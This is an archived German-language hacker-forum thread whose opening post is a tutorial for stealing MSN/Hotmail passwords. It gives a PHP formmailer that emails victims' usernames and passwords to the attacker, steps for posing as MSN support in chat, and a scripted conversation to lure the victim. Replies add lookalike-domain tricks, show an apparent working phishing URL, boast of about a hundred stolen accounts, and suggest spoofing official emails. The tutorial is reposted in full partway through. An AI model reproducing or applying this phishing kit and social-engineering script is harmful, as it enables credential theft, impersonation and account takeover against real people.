Verfügbare Informationen zu "SocialEngineering & Phishing"
Qualität des Beitrags: Beteiligte Poster: noone - Isolde - Anonymous - fatnukes2354 - M1£14n0v1( - Farudim - HauMichGelb - libanese - onelife - Nukker - E.T. Forum: Archive aus dem Unterforum: Sammelbox Antworten: 29 Forum gestartet am: Montag 06.12.2004 Sprache: deutsch Link zum Originaltopic: SocialEngineering & Phishing Letzte Antwort: vor 17 Jahren, 3 Monaten, 12 Tagen, 20 Stunden,
Alle Beiträge und Antworten zu "SocialEngineering & Phishing"
Re: SocialEngineering & Phishing
noone - 17.06.2006, 17:20SocialEngineering & Phishing
So im diesem Tut Zeige ich euch wie man mit einfachen Mitteln schnell ein MSN Passwort kriegt. Als erstes braucht ihr eine Phising-Seite für MSN/Hotmail. Hier könnt ihr zusehen wie ich eine Phisingseite bastle. Alle die das Zeugs Downloaden wollen klicken hier. Solltet ihr das Zeugs gedownloadet haben müsst ihr nurnoch im formmailer.php "your@email.adress" durch eure E-Mail Adresse ersetzen und dann Uploaden. Ich empfehle euch jedoch das ihr die Seite selbst bastelt.
Für die Selbstbastler hier das Template des Formmailers den ich verwendet habe.
Code:<?php
$yourmail = "
yourmail";
mail("$yourmail", "
$naam. Account Details.
$yourmail", "Username : $user \n Password: $passwd \n \n");
header("Location: original adress");
?>
So das wars soweit mit dem erstellen der Phisingseite. Ihr müsst das nurnoch auf nen Webspace Uploaden der PHP unterstüzt. Wo ihr solchen Space bekommt sagt euch Google.
Nun zum Teil in dem ihr euer Opfer dazu bringen müsst sein PW auf dieser Seite anzugeben. Ich gebe mich dazu als Supporter von MSN aus. Erstellt euch also eine MSN adresse ide z.B. so lauten kann "msn_support_53@msn.com". Nun loggt ihr euch mit dieser Adresse ins MSN ein. Macht euren Namen z.B. so "MSN-Support Deutschland", und nehmt ein gutes Anzeigebild. Nehmt z.B. das Schachbrett oder noch besser ihr macht euch ein MSN-Support Logo. Nun fügt ihr euer Opfer der Kontakliste hinzu (ihr werdet zu 99% angenommen). Nun führt ihr ein Gespräch mit dem Opfer das etwa so aussehen kann: (wir nehmen an die adresse des Opfer wäre "hans.meier@msn.com")
Ich: Guten Tag Herr hans.meier
Opfer: Wer sind Sie?
Ich: Ich bin offizieller Supporter von MSN.
Opfer: Ach so.
Ich: Wir von MSN hätten einige Fragen an Sie. Hätte Sie 2 Minuten Zeit?
Opfer: Ja
Ich: Gut danke.
Wieviele Stunden am Tag nutzen Sie MSN?
Opfer: 1-2 Stunden am Tag
Ich: Gut. Wir haben festgestellt das viele User Probleme beim Login haben. Wir bitten Sie sich nun auf folgender Seite kurz anzumelden, soo können wir den Fehler detailierter analysieren.
http://URL_ZUR_PHISING_SEITE
Opfer: OK
*Anmerkung: Ich hab die Daten gerade eben per E-mail erhalten. Erst jetzt geht das Gespräch weiter.*
Ich: Gut. Ich sehe die Analyse ist gerade angekommen. Danke
Haben Sie noch einen Verbesserungsvorschlag?
Opfer: Ja, beheben Sie die Login Probleme! :D
Ich: Ok, ich bin dran. ;)
Schönen Tag noch Herr hans.heier
*Anmerkung: Bei dem Teil an bei dem ihr die Daten empfangen habt. loggt ihr euch während das Gespräch weiter geht auf Hotmail.com ein un ändert das Passwort. Nach dem Ende des Gesprächs blockt ihr das Opfer.*
So nun loggt ihr euch mit MSN in den Account des Opfers ein und löscht euch aus der Kontaktliste. Nun könnt ihr den Account verwüsten die Kollegen beleidigen und was auch immer. Wollt ihr das euer Opfer sich wieder einloggen kann? Dann wechselt das Passwort wieder auf sein altes.
niemand
Re: SocialEngineering & Phishing
Isolde - 23.10.2006, 22:51thx
Wollte mich bei dir niemand bedanken für dieses tolle Tutorial,
Ich hab mal klein angefangen, und nur den Formmailer geändert und alles aufen Webspace geladen...
mittlerweile hab ich 100 Passwörter allein von MSN, hinzukommen noch Ebay, amazon, gmx, yahoo, ICQ, WoW, diverse browsergams....
Und wenn man bedenkt dass das erst der anfang ist.... was ich bisher gemacht hab war ja nur kinderkacke, obwohl ich hatte schon hin und wieder nen kömisches gefühl im Magen :?
Ich hab mittlerweile 10Email adressen :wink:
Also danke niemand
Re: SocialEngineering & Phishing
Anonymous - 29.10.2006, 21:42
hab alles so gemacht wie beschrieben...funzt auch! allerdings habe ich eine frage zu deinen beispielgespräch: "jetzt schickt man ihm die url zur phishing site "blabalabl"
- wenn man die URL in einem chat schreibt kann der typ die doch lesen, und wenn manns wie im tutorial beschrieben gemacht hat, kann der doch jetzt lesen: http://blablabla/MSNhack....
wie kann man das ändern? --ich meine das man zb. nur schreibt klicken sie "hier"
mfg gandalf....(bin anfänger,falls es ne doofe frage ist)
Re: SocialEngineering & Phishing
fatnukes2354 - 29.10.2006, 22:20
meld dich doch erstma an
aber stimmt schon die frage hab ich auch
Re: SocialEngineering & Phishing
noone - 29.10.2006, 22:38
ja und? macht euch sone url: login.live.aslkhjuioefhifeio.askduhw.com.ms
die glauben das schon ;)
Hier im board ginge das z.B. so [url = www.pppppppppp.com ] hier [/ url]
Kommt eben auf'n chat an.....
Re: SocialEngineering & Phishing
M1£14n0v1( - 30.10.2006, 00:39
hi, also, erstmal BIG THX, des tut is super, aber ich hätte eine frage...
ich wollt gleich mal so ein eigentes machen, aber ich hab gleich ein problem beim speichern der seite...
www.lokalisten.de
da fehlt das große L und die ecken sind nimmer rund, nachdem ich es gespeichert hab... weiß einer, was ich falsch gemacht hab?
Re: SocialEngineering & Phishing
noone - 30.10.2006, 11:48
Das kann passieren. Deshalb solltest du etwas von HTML verstehen, dann kannst du das Manuel nachkorrigieren.
Re: SocialEngineering & Phishing
Isolde - 30.10.2006, 17:47
niemand hat folgendes geschrieben:ja und? macht euch sone url: login.live.aslkhjuioefhifeio.askduhw.com.ms
die glauben das schon ;)
Hier im board ginge das z.B. so [url = www.pppppppppp.com ] hier [/ url]
Kommt eben auf'n chat an.....
Schaut euch mal meine an :D
http://www.support-msn.org/msnsupport/login.srfid=2DI=108XAPID=4210PS=70635NC=10009CE=11CP=1252HL=HotmailPS=70635NC=10009CE=11CP=1252HL=Hotmailvv=410lc=1031.htm
Re: SocialEngineering & Phishing
noone - 30.10.2006, 21:30
Sowas ist natürlich nahezu perfekt :D
Re: SocialEngineering & Phishing
fatnukes2354 - 30.10.2006, 22:28
wow
sehr gut geworden
*top*
muss mich auchma damit auseinandersetzen xD
Re: SocialEngineering & Phishing
Farudim - 30.10.2006, 23:45
das sieht einfach aus wie echt!
Re: SocialEngineering & Phishing
HauMichGelb - 31.10.2006, 08:10
also ich glaub ich klemm mich auch mal dahinter, sieht sehr gut aus
:sauf:
Re: SocialEngineering & Phishing
noone - 31.10.2006, 10:22
Wenn ihr das vor 4 Monaten schon begriffen hättet, als ich das Tut geposted habe....
Re: SocialEngineering & Phishing
Farudim - 31.10.2006, 14:28
Besser spät als nie, oder?
Re: SocialEngineering & Phishing
noone - 31.10.2006, 15:11
Stimmt auch...
Und nun schluss mit dem gespamme!
:bigspam:
Re: SocialEngineering & Phishing
Anonymous - 07.11.2006, 00:39
hi
ich hab leider keine ahnung von ahcken wüsste aber gerne wie ich pw´s von piczo seiten ahcken kann kann mir da jemand helfen
Re: SocialEngineering & Phishing
M1£14n0v1( - 07.11.2006, 01:26
kommt drauf an, wie du des machen willst... (wenn ich bissl wirr rede liegt des daran, dass ich mich selber nich so umwerfend auskenn)
wenn du des passwort mit roher gewalt öffnen willst, brauchst du ein brute force proggram
und wenn du des ganze mit geschick machen willst, würd ich eine phishing seite machen, so wie es im tutorial steht...
Re: SocialEngineering & Phishing
Anonymous - 07.11.2006, 19:43
wie kann ich mir denn so ne qle url machen ...?
Re: SocialEngineering & Phishing
noone - 07.11.2006, 20:23
http://www.cydots.com/
Re: SocialEngineering & Phishing
Anonymous - 07.11.2006, 20:51
ja das ich das so machen kann wusste ich schon vorher aber ich bin interesiert an so einem "URL-FAKE":
"http://www.support-msn.org/msnsupport/login.srfid=2DI=108XAPID=4210PS=70635NC=10009CE=11CP=1252HL=HotmailPS=70635NC=10009CE=11CP=1252HL=Hotmailvv=410lc=1031.htm"
würde mich sehr über weitere hilfe freuen
Re: SocialEngineering & Phishing
noone - 07.11.2006, 20:55
Er hat sich die Domain support.msn.org registriert...?
Re: SocialEngineering & Phishing
Anonymous - 07.11.2006, 21:37
achso ne ich hatte mal in irgenteinem tut gelesen das man sowas auch faken kann aber naja danke trozdem
Re: SocialEngineering & Phishing
libanese - 17.11.2006, 16:37
Hallo hab mal ne frage zu diesem thema :
So im diesem Tut Zeige ich euch wie man mit einfachen Mitteln schnell ein MSN Passwort kriegt. Als erstes braucht ihr eine Phising-Seite für MSN/Hotmail. Hier könnt ihr zusehen wie ich eine Phisingseite bastle. Alle die das Zeugs Downloaden wollen klicken hier. Solltet ihr das Zeugs gedownloadet haben müsst ihr nurnoch im formmailer.php "your@email.adress" durch eure E-Mail Adresse ersetzen und dann Uploaden. Ich empfehle euch jedoch das ihr die Seite selbst bastelt.
Für die Selbstbastler hier das Template des Formmailers den ich verwendet habe.
Code:
<?php
$yourmail = "
yourmail";
mail("$yourmail", "
$naam. Account Details.
$yourmail", "Username : $user \n Password: $passwd \n \n");
header("Location: original adress");
?>
So das wars soweit mit dem erstellen der Phisingseite. Ihr müsst das nurnoch auf nen Webspace Uploaden der PHP unterstüzt. Wo ihr solchen Space bekommt sagt euch Google.
Nun zum Teil in dem ihr euer Opfer dazu bringen müsst sein PW auf dieser Seite anzugeben. Ich gebe mich dazu als Supporter von MSN aus. Erstellt euch also eine MSN adresse ide z.B. so lauten kann "msn_support_53@msn.com". Nun loggt ihr euch mit dieser Adresse ins MSN ein. Macht euren Namen z.B. so "MSN-Support Deutschland", und nehmt ein gutes Anzeigebild. Nehmt z.B. das Schachbrett oder noch besser ihr macht euch ein MSN-Support Logo. Nun fügt ihr euer Opfer der Kontakliste hinzu (ihr werdet zu 99% angenommen). Nun führt ihr ein Gespräch mit dem Opfer das etwa so aussehen kann: (wir nehmen an die adresse des Opfer wäre "hans.meier@msn.com")
Ich: Guten Tag Herr hans.meier
Opfer: Wer sind Sie?
Ich: Ich bin offizieller Supporter von MSN.
Opfer: Ach so.
Ich: Wir von MSN hätten einige Fragen an Sie. Hätte Sie 2 Minuten Zeit?
Opfer: Ja
Ich: Gut danke.
Wieviele Stunden am Tag nutzen Sie MSN?
Opfer: 1-2 Stunden am Tag
Ich: Gut. Wir haben festgestellt das viele User Probleme beim Login haben. Wir bitten Sie sich nun auf folgender Seite kurz anzumelden, soo können wir den Fehler detailierter analysieren.
http://URL_ZUR_PHISING_SEITE
Opfer: OK
*Anmerkung: Ich hab die Daten gerade eben per E-mail erhalten. Erst jetzt geht das Gespräch weiter.*
Ich: Gut. Ich sehe die Analyse ist gerade angekommen. Danke
Haben Sie noch einen Verbesserungsvorschlag?
Opfer: Ja, beheben Sie die Login Probleme! Sehr glücklich
Ich: Ok, ich bin dran. Winken
Schönen Tag noch Herr hans.heier
*Anmerkung: Bei dem Teil an bei dem ihr die Daten empfangen habt. loggt ihr euch während das Gespräch weiter geht auf Hotmail.com ein un ändert das Passwort. Nach dem Ende des Gesprächs blockt ihr das Opfer.*
So nun loggt ihr euch mit MSN in den Account des Opfers ein und löscht euch aus der Kontaktliste. Nun könnt ihr den Account verwüsten die Kollegen beleidigen und was auch immer. Wollt ihr das euer Opfer sich wieder einloggen kann? Dann wechselt das Passwort wieder auf sein altes.
sks999
Also ich habe jetzt den formalier gemacht und die seite html und jetzt wie soll ich die beiden zusammen tun oder wie geht das das ich dann eine email mit dem passwort bekomme kann mir das jemand bitte verstendlich erklären wäre sehr sehr net....
Re: SocialEngineering & Phishing
onelife - 17.11.2006, 19:15
libanese ..... BITTE schreib ned alles rot .... da vergeht manchen das lesen ... wie mir :(
Re: SocialEngineering & Phishing
libanese - 17.11.2006, 19:16
Ja sorry !!!
aber ich habe immer noch net verstanden wie das geht da ist irgendein fehler kannst du mir helfen bitte....
Re: SocialEngineering & Phishing
onelife - 17.11.2006, 19:18
wie gesagt ... mir ist das lesen vergangen ... ändere doch die schriftfarbe und ich schaus mir mal an ^^
// k lass es sein .... ist jo das von niemand ^^
-> ich mach ein Video Tut und uppe es dann
Re: SocialEngineering & Phishing
libanese - 17.11.2006, 19:22
Ja das rote war von oben dieser html text von ska..... ich habe nur gesagt wenn ich das mache mit dieser phising seite dann kommt da so ein fehler da steht dann:
Error: Bad/No Recipient
There was no recipient or an invalid recipient specified in the data sent to FormMail. Please make sure you have filled in the recipient form field with an e-mail address that has been configured in @recipients. More information on filling in recipient form fields and variables can be found in the README file.
--------------------------------------------------------------------------------
ich weiss net was das bedeuten und wie mann das wieder hin kriegt
Re: SocialEngineering & Phishing
Nukker - 05.01.2007, 16:21
Isolde hat folgendes geschrieben:niemand hat folgendes geschrieben:ja und? macht euch sone url: login.live.aslkhjuioefhifeio.askduhw.com.ms
die glauben das schon ;)
Hier im board ginge das z.B. so [url = www.pppppppppp.com ] hier [/ url]
Kommt eben auf'n chat an.....
Schaut euch mal meine an :D
http://www.support-msn.org/msnsupport/login.srfid=2DI=108XAPID=4210PS=70635NC=10009CE=11CP=1252HL=HotmailPS=70635NC=10009CE=11CP=1252HL=Hotmailvv=410lc=1031.htm
Wie hast du eine soclhe hibekommen? Hab das auch schon probiert mit einem support-msn.de/blabla eine subdomain zu machen, aber das geht nicht, man darf nicht punkte machen...
Re: SocialEngineering & Phishing
E.T. - 13.01.2007, 15:14
Kleiner TIpp noch meinerseits:
Manchmal kriegt ihr auch offizielle emails von msn, die einfach auch speichern und mit dreamweaver anpassen könnt dann unten einfach den fake link anhängen / verstecken... dann einfach als OFFZIELLE RUNDMAIL schicken mit nem bluff absender support9_live [at] hotmail [dot] com oder so
Darauf fällt nahezu jeder rein....
Mit folgendem Code, können Sie den Beitrag ganz bequem auf ihrer Homepage verlinken
Weitere Beiträge aus dem Forum Archive
Wer ist aktiv? - gepostet von sks999 am Montag 31.07.2006
Musik - gepostet von Farudim am Samstag 23.09.2006
In andere Rechner loggen!!!!! - gepostet von Blabor am Donnerstag 09.12.2004
Was kommt hier hin??? - gepostet von Neophyte am Mittwoch 12.04.2006
help me - gepostet von play_boy_tommy am Montag 06.03.2006
welche sind.. - gepostet von bubi am Montag 10.07.2006
messenger passwort knacken? - gepostet von Cino am Montag 03.04.2006
Suche Unsecure - gepostet von onelife am Samstag 11.11.2006
Ähnliche Beiträge wie "SocialEngineering & Phishing"
SPAM/VIREN/PHISHING/HOAX - Hartie (Donnerstag 01.06.2006)
Deutsche Bank Phishing - jagger (Sonntag 29.05.2005)
Neue Phishing-Methode - jagger (Samstag 22.10.2005)
Phishing Mails - Franz König (Sonntag 14.01.2007)
PHISHING - lenbach (Samstag 30.10.2004)
[Sicherheitsalarm!!!] Phishing-Webseiten - xD4rkCl0udx (Samstag 01.09.2007)
Postbank Phishing - Achtung an alle - jagger (Mittwoch 28.09.2005)
Warnung vor Phishing-Mails - Traxxtor (Dienstag 02.05.2006)
Phishing - Nosferatu (Sonntag 13.08.2006)
Fuzo übersetzt Phishing - dejost (Sonntag 21.05.2006)